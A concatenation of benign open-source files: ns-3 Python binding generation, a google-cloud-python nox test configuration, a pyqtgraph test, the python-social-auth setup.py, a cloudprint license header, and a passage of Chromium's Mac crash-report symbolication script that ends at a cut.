## random-variable.h (module 'core'): ns3::RandomVariableValue::RandomVariableValue(ns3::RandomVariable const & value) [constructor]
cls.add_constructor([param('ns3::RandomVariable const &', 'value')])
## random-variable.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::RandomVariableValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## random-variable.h (module 'core'): bool ns3::RandomVariableValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## random-variable.h (module 'core'): ns3::RandomVariable ns3::RandomVariableValue::Get() const [member function]
cls.add_method('Get',
'ns3::RandomVariable',
[],
is_const=True)
## random-variable.h (module 'core'): std::string ns3::RandomVariableValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## random-variable.h (module 'core'): void ns3::RandomVariableValue::Set(ns3::RandomVariable const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::RandomVariable const &', 'value')])
return
def register_Ns3TimeChecker_methods(root_module, cls):
## nstime.h (module 'core'): ns3::TimeChecker::TimeChecker() [constructor]
cls.add_constructor([])
## nstime.h (module 'core'): ns3::TimeChecker::TimeChecker(ns3::TimeChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TimeChecker const &', 'arg0')])
return
def register_Ns3TimeValue_methods(root_module, cls):
## nstime.h (module 'core'): ns3::TimeValue::TimeValue() [constructor]
cls.add_constructor([])
## nstime.h (module 'core'): ns3::TimeValue::TimeValue(ns3::TimeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TimeValue const &', 'arg0')])
## nstime.h (module 'core'): ns3::TimeValue::TimeValue(ns3::Time const & value) [constructor]
cls.add_constructor([param('ns3::Time const &', 'value')])
## nstime.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::TimeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## nstime.h (module 'core'): bool ns3::TimeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## nstime.h (module 'core'): ns3::Time ns3::TimeValue::Get() const [member function]
cls.add_method('Get',
'ns3::Time',
[],
is_const=True)
## nstime.h (module 'core'): std::string ns3::TimeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## nstime.h (module 'core'): void ns3::TimeValue::Set(ns3::Time const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Time const &', 'value')])
return
def register_Ns3TypeIdChecker_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker(ns3::TypeIdChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeIdChecker const &', 'arg0')])
return
def register_Ns3TypeIdValue_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeIdValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeIdValue const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeId const & value) [constructor]
cls.add_constructor([param('ns3::TypeId const &', 'value')])
## type-id.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::TypeIdValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## type-id.h (module 'core'): bool ns3::TypeIdValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeIdValue::Get() const [member function]
cls.add_method('Get',
'ns3::TypeId',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeIdValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## type-id.h (module 'core'): void ns3::TypeIdValue::Set(ns3::TypeId const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::TypeId const &', 'value')])
return
def register_Ns3Vector2DChecker_methods(root_module, cls):
## vector.h (module 'core'): ns3::Vector2DChecker::Vector2DChecker() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector2DChecker::Vector2DChecker(ns3::Vector2DChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector2DChecker const &', 'arg0')])
return
def register_Ns3Vector2DValue_methods(root_module, cls):
## vector.h (module 'core'): ns3::Vector2DValue::Vector2DValue() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector2DValue::Vector2DValue(ns3::Vector2DValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector2DValue const &', 'arg0')])
## vector.h (module 'core'): ns3::Vector2DValue::Vector2DValue(ns3::Vector2D const & value) [constructor]
cls.add_constructor([param('ns3::Vector2D const &', 'value')])
## vector.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::Vector2DValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## vector.h (module 'core'): bool ns3::Vector2DValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## vector.h (module 'core'): ns3::Vector2D ns3::Vector2DValue::Get() const [member function]
cls.add_method('Get',
'ns3::Vector2D',
[],
is_const=True)
## vector.h (module 'core'): std::string ns3::Vector2DValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## vector.h (module 'core'): void ns3::Vector2DValue::Set(ns3::Vector2D const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Vector2D const &', 'value')])
return
def register_Ns3Vector3DChecker_methods(root_module, cls):
## vector.h (module 'core'): ns3::Vector3DChecker::Vector3DChecker() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector3DChecker::Vector3DChecker(ns3::Vector3DChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector3DChecker const &', 'arg0')])
return
def register_Ns3Vector3DValue_methods(root_module, cls):
## vector.h (module 'core'): ns3::Vector3DValue::Vector3DValue() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector3DValue::Vector3DValue(ns3::Vector3DValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector3DValue const &', 'arg0')])
## vector.h (module 'core'): ns3::Vector3DValue::Vector3DValue(ns3::Vector3D const & value) [constructor]
cls.add_constructor([param('ns3::Vector3D const &', 'value')])
## vector.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::Vector3DValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## vector.h (module 'core'): bool ns3::Vector3DValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## vector.h (module 'core'): ns3::Vector3D ns3::Vector3DValue::Get() const [member function]
cls.add_method('Get',
'ns3::Vector3D',
[],
is_const=True)
## vector.h (module 'core'): std::string ns3::Vector3DValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## vector.h (module 'core'): void ns3::Vector3DValue::Set(ns3::Vector3D const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Vector3D const &', 'value')])
return
def register_functions(root_module):
module = root_module
register_functions_ns3_FatalImpl(module.get_submodule('FatalImpl'), root_module)
return
def register_functions_ns3_FatalImpl(module, root_module):
return
def main():
out = FileCodeSink(sys.stdout)
root_module = module_init()
register_types(root_module)
register_methods(root_module)
register_functions(root_module)
root_module.generate(out)
if __name__ == '__main__':
main()
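# Note (a sketch, not part of the generated bindings): executed directly, this
# script streams the pybindgen-generated C++ binding code to stdout via
# FileCodeSink(sys.stdout), so a hypothetical invocation would be
#     python <this_module>.py > propagation-module-bindings.cc
# The script and output file names are assumptions; the actual targets depend
# on the ns-3 build layout.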
|
tartavull/google-cloud-python
|
refs/heads/master
|
speech/nox.py
|
2
|
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import os
import nox
LOCAL_DEPS = ('../core/',)
@nox.session
@nox.parametrize('python_version', ['2.7', '3.4', '3.5', '3.6'])
def unit_tests(session, python_version):
"""Run the unit test suite."""
# Run unit tests against all supported versions of Python.
session.interpreter = 'python{}'.format(python_version)
# Set the virtualenv dirname.
session.virtualenv_dirname = 'unit-' + python_version
# Install all test dependencies, then install this package in-place.
session.install('mock', 'pytest', 'pytest-cov', *LOCAL_DEPS)
session.install('-e', '.')
# Run py.test against the unit tests.
session.run(
'py.test', '--quiet',
'--cov=google.cloud.speech',
'--cov=google.cloud.speech_v1',
        '--cov=tests.unit',
'--cov-append',
'--cov-config=.coveragerc',
'--cov-report=',
'--cov-fail-under=0',
os.path.join('tests', 'unit'),
)
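# Hedged usage sketch: with nox's parametrize decorator above, a single
# variant of this session can be selected from the command line, e.g.
#     nox --session "unit_tests(python_version='3.6')"
# The quoting is needed so the shell passes the parametrization string intact.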
@nox.session
@nox.parametrize('python_version', ['2.7', '3.6'])
def system_tests(session, python_version):
"""Run the system test suite."""
# Sanity check: Only run system tests if the environment variable is set.
if not os.environ.get('GOOGLE_APPLICATION_CREDENTIALS', ''):
session.skip('Credentials must be set via environment variable.')
# Run the system tests against latest Python 2 and Python 3 only.
session.interpreter = 'python{}'.format(python_version)
# Set the virtualenv dirname.
session.virtualenv_dirname = 'sys-' + python_version
# Install all test dependencies, then install this package into the
    # virtualenv's dist-packages.
session.install('mock', 'pytest', *LOCAL_DEPS)
session.install('../test_utils/', '../storage/')
session.install('.')
# Run py.test against the system tests.
session.run('py.test', '--quiet', 'tests/system.py')
@nox.session
def lint(session):
"""Run linters.
Returns a failure if the linters find linting errors or sufficiently
serious code quality issues.
"""
session.interpreter = 'python3.6'
session.install('flake8', 'pylint', 'gcp-devrel-py-tools', *LOCAL_DEPS)
session.install('.')
session.run('flake8', 'google/cloud/speech')
session.run(
'gcp-devrel-py-tools', 'run-pylint',
'--config', 'pylint.config.py',
'--library-filesets', 'google',
'--test-filesets', 'tests',
# Temporarily allow this to fail.
success_codes=range(0, 100))
@nox.session
def lint_setup_py(session):
"""Verify that setup.py is valid (including RST check)."""
session.interpreter = 'python3.6'
# Set the virtualenv dirname.
session.virtualenv_dirname = 'setup'
session.install('docutils', 'Pygments')
session.run(
'python', 'setup.py', 'check', '--restructuredtext', '--strict')
@nox.session
def cover(session):
"""Run the final coverage report.
This outputs the coverage report aggregating coverage from the unit
test runs (not system test runs), and then erases coverage data.
"""
session.interpreter = 'python3.6'
session.chdir(os.path.dirname(__file__))
session.install('coverage', 'pytest-cov')
session.run('coverage', 'report', '--show-missing', '--fail-under=100')
session.run('coverage', 'erase')
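# A plausible local workflow (assumed, not mandated by this file): run the
# parametrized unit tests first, then aggregate their coverage data:
#     nox --session unit_tests cover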
|
TUB-Control/PaPI
|
refs/heads/master
|
papi/pyqtgraph/imageview/tests/test_imageview.py
|
33
|
import pyqtgraph as pg
import numpy as np
app = pg.mkQApp()
def test_nan_image():
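    """pg.image should display an array containing NaN without raising."""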
img = np.ones((10,10))
img[0,0] = np.nan
v = pg.image(img)
app.processEvents()
v.window().close()
|
jeyraof/python-social-auth
|
refs/heads/master
|
setup.py
|
47
|
# -*- coding: utf-8 -*-
"""Setup file for easy installation"""
import sys
import os
from os.path import join, dirname, split
from setuptools import setup
PY3 = os.environ.get('BUILD_VERSION') == '3' or sys.version_info[0] == 3
version = __import__('social').__version__
LONG_DESCRIPTION = """
Python Social Auth is an easy-to-set-up social authentication/registration
mechanism with support for several frameworks and auth providers.
Crafted using base code from django-social-auth, it implements a common
interface for defining new authentication providers from third parties and
for bringing support to more frameworks and ORMs.
"""
def long_description():
"""Return long description from README.rst if it's present
because it doesn't get installed."""
try:
return open(join(dirname(__file__), 'README.rst')).read()
except IOError:
return LONG_DESCRIPTION
def path_tokens(path):
if not path:
return []
head, tail = split(path)
return path_tokens(head) + [tail]
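# Illustrative example (input made up, not from the original file):
# path_tokens('social/backends/utils') -> ['social', 'backends', 'utils']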
def get_packages():
exclude_packages = ('__pycache__',)
packages = []
for path_info in os.walk('social'):
tokens = path_tokens(path_info[0])
if tokens[-1] not in exclude_packages:
packages.append('.'.join(tokens))
return packages
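# Illustrative result (package names shown are examples only):
# ['social', 'social.backends', 'social.apps', ...]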
requirements_file, tests_requirements_file = {
False: ('requirements.txt', 'social/tests/requirements.txt'),
True: ('requirements-python3.txt', 'social/tests/requirements-python3.txt')
}[PY3]
with open(requirements_file, 'r') as f:
requirements = f.readlines()
with open(tests_requirements_file, 'r') as f:
tests_requirements = [line for line in f.readlines() if '@' not in line]
setup(
name='python-social-auth',
version=version,
author='Matias Aguirre',
author_email='matiasaguirre@gmail.com',
description='Python social authentication made simple.',
license='BSD',
keywords='django, flask, pyramid, webpy, openid, oauth, social auth',
url='https://github.com/omab/python-social-auth',
packages=get_packages(),
long_description=long_description(),
install_requires=requirements,
classifiers=[
'Development Status :: 4 - Beta',
'Topic :: Internet',
'License :: OSI Approved :: BSD License',
'Intended Audience :: Developers',
'Environment :: Web Environment',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3'
],
package_data={
'social.tests': ['*.txt']
},
include_package_data=True,
tests_require=tests_requirements,
test_suite='social.tests',
zip_safe=False
)
|
davesteele/cloudprint-service
|
refs/heads/master
|
cloudprint/__init__.py
|
6
|
# Copyright 2014 Jason Michalski <armooo@armooo.net>
#
# This file is part of cloudprint.
#
# cloudprint is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# cloudprint is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with cloudprint. If not, see <http://www.gnu.org/licenses/>.
|
mkaluza/external_chromium_org
|
refs/heads/kk44
|
tools/mac/symbolicate_crash.py
|
178
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
This script can take an Apple-style CrashReporter log and symbolicate it. This
is useful when a user's reports aren't being uploaded, for example.
Only version 6, 7, 8, and 9 reports are supported. For more information on the
file format, reference this document:
TN2123 <http://developer.apple.com/library/mac/#technotes/tn2004/tn2123.html>
Information on symbolication was gleaned from:
<http://developer.apple.com/tools/xcode/symbolizingcrashdumps.html>
"""
import optparse
import os.path
import re
import subprocess
import sys
# Maps binary image identifiers to binary names (minus the .dSYM portion) found
# in the archive. These are the only objects that will be looked up.
SYMBOL_IMAGE_MAP = {
'com.google.Chrome': 'Google Chrome.app',
'com.google.Chrome.framework': 'Google Chrome Framework.framework',
'com.google.Chrome.helper': 'Google Chrome Helper.app'
}
class CrashReport(object):
"""A parsed representation of an Apple CrashReport text file."""
def __init__(self, file_name):
super(CrashReport, self).__init__()
self.report_info = {}
self.threads = []
self._binary_images = {}
fd = open(file_name, 'r')
self._ParseHeader(fd)
# Try and get the report version. If it's not a version we handle, abort.
self.report_version = int(self.report_info['Report Version'])
# Version 6: 10.5 and 10.6 crash report
# Version 7: 10.6 spindump report
# Version 8: 10.7 spindump report
# Version 9: 10.7 crash report
valid_versions = (6, 7, 8, 9)
if self.report_version not in valid_versions:
raise Exception("Only crash reports of versions %s are accepted." %
str(valid_versions))
# If this is a spindump (version 7 or 8 report), use a special parser. The
# format is undocumented, but is similar to version 6. However, the spindump
# report contains user and kernel stacks for every process on the system.
if self.report_version == 7 or self.report_version == 8:
self._ParseSpindumpStack(fd)
else:
self._ParseStack(fd)
self._ParseBinaryImages(fd)
fd.close()
def Symbolicate(self, symbol_path):
"""Symbolicates a crash report stack trace."""
# In order to be efficient, collect all the offsets that will be passed to
# atos by the image name.
offsets_by_image = self._CollectAddressesForImages(SYMBOL_IMAGE_MAP.keys())
# For each image, run atos with the list of addresses.
for image_name, addresses in offsets_by_image.items():
# If this image was not loaded or is in no stacks, skip.
if image_name not in self._binary_images or not len(addresses):
continue
# Combine the |image_name| and |symbol_path| into the path of the dSYM.
dsym_file = self._GetDSymPath(symbol_path, image_name)
# From the list of 2-Tuples of (frame, address), create a list of just
# addresses.
address_list = map(lambda x: x[1], addresses)
# Look up the load address of the image.
binary_base = self._binary_images[image_name][0]
# This returns a list of just symbols. The indices will match up with the
# list of |addresses|.
symbol_names = self._RunAtos(binary_base, dsym_file, address_list)
if not symbol_names:
print 'Error loading symbols for ' + image_name
continue
# Attaches a list of symbol names to stack frames. This assumes that the
# order of |addresses| has stayed the same as |symbol_names|.
self._AddSymbolsToFrames(symbol_names, addresses)
def _ParseHeader(self, fd):
"""Parses the header section of a crash report, which contains the OS and
application version information."""
# The header is made up of different sections, depending on the type of
# report and the report version. Almost all have a format of a key and
# value separated by a colon. Accumulate all of these artifacts into a
# dictionary until the first thread stack is reached.
thread_re = re.compile('^[ \t]*Thread ([a-f0-9]+)')
line = ''
while not thread_re.match(line):
# Skip blank lines. There are typically three or four sections separated
# by newlines in the header.
line = line.strip()
if line:
parts = line.split(':', 1)
# Certain lines in different report versions don't follow the key-value
# format, so skip them.
if len(parts) == 2:
# There's a varying amount of space padding after the ':' to align all
# the values; strip that.
self.report_info[parts[0]] = parts[1].lstrip()
line = fd.readline()
# When this loop exits, the header has been read in full. However, the first
# thread stack heading has been read past. Seek backwards from the current
# position by the length of the line so that it is re-read when
# _ParseStack() is entered.
fd.seek(-len(line), os.SEEK_CUR)
def _ParseStack(self, fd):
"""Parses the stack dump of a crash report and creates a list of threads
and their stack traces."""
# Compile a regex that matches the start of a thread stack. Note that this
# must be specific to not include the thread state section, which comes
# right after all the stack traces.
line_re = re.compile('^Thread ([0-9]+)( Crashed)?:(.*)')
# On entry into this function, the fd has been walked up to the "Thread 0"
# line.
line = fd.readline().rstrip()
in_stack = False
thread = None
while line_re.match(line) or in_stack:
# Check for start of the thread stack.
matches = line_re.match(line)
if not line.strip():
# A blank line indicates a break in the thread stack.
in_stack = False
elif matches:
# If this is the start of a thread stack, create the CrashThread.
in_stack = True
thread = CrashThread(matches.group(1))
thread.name = matches.group(3)
thread.did_crash = matches.group(2) != None
self.threads.append(thread)
else:
# All other lines are stack frames.
thread.stack.append(self._ParseStackFrame(line))
# Read the next line.
line = fd.readline()
def _ParseStackFrame(self, line):
"""Takes in a single line of text and transforms it into a StackFrame."""
frame = StackFrame(line)
# A stack frame is in the format of:
# |<frame-number> <binary-image> 0x<address> <symbol> <offset>|.
regex = '^([0-9]+) +(.+)[ \t]+(0x[0-9a-f]+) (.*) \+ ([0-9]+)$'
matches = re.match(regex, line)
if matches is None:
return frame
# Create a stack frame with the information extracted from the regex.
frame.frame_id = matches.group(1)
frame.image = matches.group(2)
frame.address = int(matches.group(3), 0) # Convert HEX to an int.
frame.original_symbol = matches.group(4)
frame.offset = matches.group(5)
frame.line = None
return frame
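# An illustrative frame line the regex above is meant to match (image,
# address, and symbol are made up for this example):
# 0   com.google.Chrome.framework   0x0000000100123456 ChromeMain + 42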
def _ParseSpindumpStack(self, fd):
"""Parses a spindump stack report. In this format, each thread stack has
both a user and kernel trace. Only the user traces are symbolicated."""
# The stack trace begins with the thread header, which is identified by a
# HEX number. The thread names appear to be incorrect in spindumps.
user_thread_re = re.compile('^ Thread ([0-9a-fx]+)')
# When this method is called, the fd has been walked right up to the first
# line.
line = fd.readline()
in_user_stack = False
in_kernel_stack = False
thread = None
frame_id = 0
while user_thread_re.match(line) or in_user_stack or in_kernel_stack:
# Check for the start of a thread.
matches = user_thread_re.match(line)
if not line.strip():
# A blank line indicates the start of a new thread. The blank line comes
# after the kernel stack before a new thread header.
in_kernel_stack = False
elif matches:
# This is the start of a thread header. The next line is the heading for
# the user stack, followed by the actual trace.
thread = CrashThread(matches.group(1))
frame_id = 0
self.threads.append(thread)
in_user_stack = True
line = fd.readline() # Read past the 'User stack:' header.
elif line.startswith(' Kernel stack:'):
# The kernel stack header comes immediately after the last frame (really
# the top frame) in the user stack, without a blank line.
in_user_stack = False
in_kernel_stack = True
elif in_user_stack:
# If this is a line while in the user stack, parse it as a stack frame.
thread.stack.append(self._ParseSpindumpStackFrame(line))
# Loop with the next line.
line = fd.readline()
# When the loop exits, the file has been read through the 'Binary images:'
# header. Seek backwards so that _ParseBinaryImages() does the right thing.
fd.seek(-len(line), os.SEEK_CUR)
def _ParseSpindumpStackFrame(self, line):
"""Parses a spindump-style stackframe."""
frame = StackFrame(line)
# The format of the frame is either:
# A: |<space><steps> <symbol> + <offset> (in <image-name>) [<address>]|
# B: |<space><steps> ??? (in <image-name> + <offset>) [<address>]|
regex_a = '^([ ]+[0-9]+) (.*) \+ ([0-9]+) \(in (.*)\) \[(0x[0-9a-f]+)\]'
regex_b = '^([ ]+[0-9]+) \?\?\?( \(in (.*) \+ ([0-9]+)\))? \[(0x[0-9a-f]+)\]'
# Create the stack frame with the information extracted from the regex.
matches = re.match(regex_a, line)
if matches:
frame.frame_id = matches.group(1)[4:] # Remove some leading spaces.
frame.original_symbol = matches.group(2)
frame.offset = matches.group(3)
frame.image = matches.group(4)
frame.address = int(matches.group(5), 0)
frame.line = None
return frame
# If pattern A didn't match (which it will most of the time), try B.
matches = re.match(regex_b, line)
if matches:
frame.frame_id = matches.group(1)[4:] # Remove some leading spaces.
frame.image = matches.group(3)
frame.offset = matches.group(4)
frame.address = int(matches.group(5), 0)
frame.line = None
return frame
# Otherwise, this frame could not be matched and just use the raw input.
frame.line = frame.line.strip()
return frame
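# Illustrative lines for patterns A and B above (all values made up):
#    10 ChromeMain + 42 (in Google Chrome Framework) [0x100123456]
#    11 ??? (in libSystem.B.dylib + 123) [0x7fff80000123]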
def _ParseBinaryImages(self, fd):
"""Parses out the binary images section in order to get the load offset."""
# The parser skips some sections, so advance until the "Binary Images"
# header is reached.
while not fd.readline().lstrip().startswith("Binary Images:"): pass
# Create a regex to match the lines of format:
# |0x<start> - 0x<end> <binary-image> <version> (<version>) <<UUID>> <path>|
image_re = re.compile(
'[ ]*(0x[0-9a-f]+) -[ \t]+(0x[0-9a-f]+) [+ ]([a-zA-Z0-9._\-]+)')
# This section is in this format:
# |<start address> - <end address> <image name>|.
while True:
line = fd.readline()
if not line.strip():
# End when a blank line is hit.
return
# Match the line to the regex.
match = image_re.match(line)
if match:
# Store the offsets by image name so it can be referenced during
# symbolication. These are hex numbers with leading '0x', so int() can
# convert them to decimal if base=0.
address_range = (int(match.group(1), 0), int(match.group(2), 0))
self._binary_images[match.group(3)] = address_range
def _CollectAddressesForImages(self, images):
"""Iterates all the threads and stack frames and all the stack frames that
are in a list of binary |images|. The result is a dictionary, keyed by the
image name that maps to a list of tuples. Each is a 2-Tuple of
(stack_frame, address)"""
# Create the collection and initialize it with empty lists for each image.
collection = {}
for image in images:
collection[image] = []
# Perform the iteration.
for thread in self.threads:
for frame in thread.stack:
image_name = self._ImageForAddress(frame.address)
if image_name in images:
# Replace the image name in the frame in case it was elided.
frame.image = image_name
collection[frame.image].append((frame, frame.address))
# Return the result.
return collection
def _ImageForAddress(self, address):
"""Given a PC address, returns the bundle identifier of the image in which
the address resides."""
for image_name, address_range in self._binary_images.items():
if address >= address_range[0] and address <= address_range[1]:
return image_name
return None
def _GetDSymPath(self, base_path, image_name):
"""Takes a base path for the symbols and an image name. It looks the name up
in SYMBOL_IMAGE_MAP and creates a full path to the dSYM in the bundle."""
image_file = SYMBOL_IMAGE_MAP[image_name]
return os.path.join(base_path, image_file + '.dSYM', 'Contents',
'Resources', 'DWARF',
os.path.splitext(image_file)[0]) # Chop off the extension.
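# e.g. for 'com.google.Chrome.framework' this returns (illustratively):
# <symbol_path>/Google Chrome Framework.framework.dSYM/Contents/Resources/
# DWARF/Google Chrome Framework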
def _RunAtos(self, load_address, dsym_file, addresses):
"""Runs the atos with the provided arguments. |addresses| is used as stdin.
Returns a list of symbol information in the same order as |addresses|."""
args = ['atos', '-l', str(load_address), '-o', dsym_file]
# Get the arch type. This is of the format |X86 (Native)|.
if 'Code Type' in self.report_info:
arch = self.report_info['Code Type'].lower().split(' ')
if len(arch) == 2:
arch = arch[0]
if arch == 'x86':
# The crash report refers to i386 as x86, but atos doesn't know what
# that is.
arch = 'i386'
args.extend(['-arch', arch])
proc = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
addresses = map(hex, addresses)
(stdout, stderr) = proc.communicate(' '.join(addresses))
if proc.returncode:
return None
return stdout.rstrip().split('\n')
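# Illustrative invocation (load address, dSYM path, and addresses made up):
# runs |atos -l 0x100000000 -o Chrome.dSYM/.../Chrome -arch i386| and writes
# '0x100001234 0x100005678' to its stdin, one symbol per line coming back.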
def _AddSymbolsToFrames(self, symbols, address_tuples):
"""Takes a single value (the list) from _CollectAddressesForImages and does
a smart-zip with the data returned by atos in |symbols|. Note that the
indices must match for this to succeed."""
if len(symbols) != len(address_tuples):
print 'symbols do not match'
# Each line of output from atos is in this format:
# |<symbol> (in <image>) (<file>:<line>)|.
line_regex = re.compile('(.+) \(in (.+)\) (\((.+):([0-9]+)\))?')
# Zip the two data sets together.
for i in range(len(symbols)):
symbol_parts = line_regex.match(symbols[i])
if not symbol_parts:
continue # Error.
frame = address_tuples[i][0]
frame.symbol = symbol_parts.group(1)
frame.image = symbol_parts.group(2)
frame.file_name = symbol_parts.group(4)
frame.line_number = symbol_parts.group(5)
class CrashThread(object):
"""A CrashThread represents a stacktrace of a single thread """
def __init__(self, thread_id):
super(CrashThread, self).__init__()
self.thread_id = thread_id
self.name = None
self.did_crash = False
self.stack = []
def __repr__(self):
name = ''
if self.name:
name = ': ' + self.name
return 'Thread ' + self.thread_id + name + '\n' + \
'\n'.join(map(str, self.stack))
class StackFrame(object):
"""A StackFrame is owned by a CrashThread."""
def __init__(self, line):
super(StackFrame, self).__init__()
# The original line. This will be set to None if symbolication was
# successful.
self.line = line
self.frame_id = 0
self.image = None
self.address = 0x0
self.original_symbol = None
self.offset = 0x0
# The following members are set after symbolication.
self.symbol = None
self.file_name = None
self.line_number = 0
def __repr__(self):
# If symbolication failed, just use the original line.
if self.line:
return ' %s' % self.line
# Use different location information depending on symbolicated data.
location = None
if self.file_name:
location = ' - %s:%s' % (self.file_name, self.line_number)
else:
location = ' + %s' % self.offset
# Same with the symbol information.
symbol = self.original_symbol
if self.symbol:
symbol = self.symbol
return ' %s\t0x%x\t[%s\t%s]\t%s' % (self.frame_id, self.address,
self.image, location, symbol)
def PrettyPrintReport(report):
"""Takes a crash report and prints it like the crash server would."""
print 'Process : ' + report.report_info['Process']
print 'Version : ' + report.report_info['Version']
print 'Date : ' + report.report_info['Date/Time']
print 'OS Version : ' + report.report_info['OS Version']
print
if 'Crashed Thread' in report.report_info:
print 'Crashed Thread : ' + report.report_info['Crashed Thread']
print
if 'Event' in report.report_info:
print 'Event : ' + report.report_info['Event']
print
for thread in report.threads:
print
if thread.did_crash:
exc_type = report.report_info['Exception Type'].split(' ')[0]
exc_code = report.report_info['Exception Codes'].replace('at', '@')
print '*CRASHED* ( ' + exc_type + ' / ' + exc_code + ' )'
# Version 7 reports have spindump-style output (with a stepped stack trace),
# so remove the first tab to get better alignment.
if report.report_version == 7:
for line in repr(thread).split('\n'):
print line.replace('\t', ' ', 1)
else:
print thread
def Main(args):
"""Program main."""
parser = optparse.OptionParser(
usage='%prog [options] symbol_path crash_report',
description='This will parse and symbolicate an Apple CrashReporter v6-9 '
'file.')
parser.add_option('-s', '--std-path', action='store_true', dest='std_path',
help='With this flag, the symbol_path is a containing '
'directory, in which dSYM files are stored in a '
'directory named by the version. Example: '
'[symbolicate_crash.py -s ./symbols/ report.crash] will '
